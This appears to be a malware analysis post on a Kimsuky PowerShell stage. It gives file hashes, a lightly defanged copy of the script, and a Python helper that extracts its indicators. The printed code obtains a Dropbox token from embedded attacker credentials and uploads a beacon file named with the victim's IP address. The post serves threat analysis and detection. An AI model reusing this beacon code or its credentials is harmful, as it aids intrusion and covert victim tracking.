Malware created by the North Korean APT Kimsuky - system_first.ps1 (2024.11.27)
This malware is the PowerShell code that was fetched from Dropbox when the malware from pay.bat, covered in yesterday's post, was executed.
The hash values are as follows:
File name: system_first.ps1
Size: 1,532 bytes
MD5: e598db51ddee48b7c351b68aebf76ebf
SHA-1: 60cdedb45513069a5d67310529966681bd0b4663
SHA-256: ed55bb081d0e4dfeefd7af35dbb0a0481be192d3d0759631c951f7d6d5737749
[Software Tips/Security and Analysis] - Malware created by APT Kimsuky - pay.bat (2024.11.27)
Malicious PowerShell code
$ttttttttttttt(t)ttttttttppppp(p)pppppppppppppp = $env:AppData;
$tokenRequestParams = @{
grant_type = "refresh_toke(n)"
refresh_token = "CxR76FAp2JAAAAA(A)AAAAAYc-Z6EEUm1sCkIn(Z)nCsHRQKCp5lOSKBMipCEudngc-l";
client_id = "8azq(s)rgxsd8fwrg"
client_secret = "jjaqv85b(m)knr7st"
}
$qwa = "hxxps://a" (+) "pi(.)dr" + "opboxa" (+) "pi(.)com/oau" + "th2(/)to" (+) "ken"
$myttto = Invoke-(R)estMethod -Uri ($)qwa -Method Post -Body $(t)okenRequestParams
$ipAddress = (Get-WmiObj(e)ct Win32_NetworkAda(p)terConfiguration | Where(-)Object { $_.IP(A)ddress -ne $null }).IPAddress[0]
$currentTi(m)e = Get-(D)ate -Format "MMdd_HHmm"
$fileName = "$ipAddress-$(c)urrentTime-XXX-santa2(.)txt"
$srcPath = Join-Path $tttttttttt(t)tttttttttttpppppppp(p)ppppppppppp $fileName
"xmil" | Out-File -Fi(l)ePath $srcPath
$outputFile = Split-Pa(t)h $srcPath -leaf
$tttttffffppp="/githut/sa(n)ta2_persist/$outputFile"
$arg = '{ "path": "' + $tttt(t)ffffppp + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $(($)myttto.access_token)
$headers = New-Object "System.Coll(e)ctions.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $auth(o)rization)
$headers.Add("D(r)opbox-API-Arg", $arg)
$headers.Add("Cont(e)nt-Type", 'applic(a)tion/octet-stream')
$diauyadsf = "djda(i)djaid"
$diaahah = "1818adjfi(a)sdjif"
$djaijd = 19029831(2)838123
$urrrr = "hxxps://content(.)drop"+"boxa"+"pi(.)com/2/f" (+) "iles/uplo" + "ad";
Invoke-RestMethod -Uri $urrrr -Method Post -InFile $srcPat(h) -Headers $headers
Remove-Item -Path $s(r)cPath;
Code analysis
1. Environment variable and file path creation
$env:AppData: retrieves the user's AppData path, the location where the Windows operating system keeps per-user data …
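As an added example (not part of the original post, and not Kimsuky's code), a small Python triage helper that folds the split string literals back together, recovers the Dropbox endpoints and tags the behaviours seen in the script above; the script it runs on is a constructed sample that mirrors the page's structure with the refresh token and client secret removed.

```python
import re

# Constructed sample modelled on the script above: same string-splitting,
# headers and cmdlets, but the real refresh token and client secret are omitted.
SAMPLE_SCRIPT = r'''
$ttttttttttttttttttttttpppppppppppppppppppp = $env:AppData;
$tokenRequestParams = @{ grant_type = "refresh_token"; refresh_token = "<REDACTED>" }
$qwa = "https://a" + "pi.dr" + "opboxa" + "pi.com/oau" + "th2/to" + "ken"
$myttto = Invoke-RestMethod -Uri $qwa -Method Post -Body $tokenRequestParams
$ipAddress = (Get-WmiObject Win32_NetworkAdapterConfiguration | Where-Object { $_.IPAddress -ne $null }).IPAddress[0]
$headers.Add("Dropbox-API-Arg", $arg)
$urrrr = "https://content.drop"+"boxa"+"pi.com/2/f" + "iles/uplo" + "ad";
Invoke-RestMethod -Uri $urrrr -Method Post -InFile $srcPath -Headers $headers
Remove-Item -Path $srcPath;
'''

# '"a" + "b"' is two adjacent literals; deleting the '" + "' seam yields '"ab"'.
CONCAT_RE = re.compile(r'"\s*\+\s*"')
URL_RE = re.compile(r'https?://[^\s"\']+')
# Variable names made of long runs of one repeated letter ($tttt...pppp...).
REPEAT_VAR_RE = re.compile(r'\$(?:([a-z])\1{4,})+')

# Behaviours of this script worth tagging; each is a regex over the folded text.
INDICATORS = [
    ("dropbox_oauth_refresh", re.compile(r'api\.dropboxapi\.com/oauth2/token')),
    ("dropbox_file_upload", re.compile(r'content\.dropboxapi\.com/2/files/upload')),
    ("dropbox_api_arg_header", re.compile(r'Dropbox-API-Arg', re.I)),
    ("http_upload_of_local_file", re.compile(r'Invoke-RestMethod[^\n]*-InFile', re.I)),
    ("host_ip_collection", re.compile(r'Win32_NetworkAdapterConfiguration', re.I)),
    ("local_cleanup_after_upload", re.compile(r'Remove-Item', re.I)),
]

def fold_string_concat(script: str) -> str:
    """Collapse chains of "x" + "y" string literals into single literals."""
    return CONCAT_RE.sub('', script)

def analyze(script: str) -> dict:
    """Recover the concatenated URLs and tag the behaviours present in a script."""
    folded = fold_string_concat(script)
    urls = sorted(set(URL_RE.findall(folded)))
    tags = [name for name, rx in INDICATORS if rx.search(folded)]
    if REPEAT_VAR_RE.search(folded):
        tags.append("repeated_char_variable_names")
    return {"urls": urls, "indicators": tags}

if __name__ == "__main__":
    for key, value in analyze(SAMPLE_SCRIPT).items():
        print(key, value)
```

The same folding step can be run over PowerShell script block log entries (Event ID 4104) before matching, since the split literals only appear in the script text, never in the resulting HTTP traffic.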
IoC
ed55bb081d0e4dfeefd7af35dbb0a0481be192d3d0759631c951f7d6d5737749
e598db51ddee48b7c351b68aebf76ebf
60cdedb45513069a5d67310529966681bd0b4663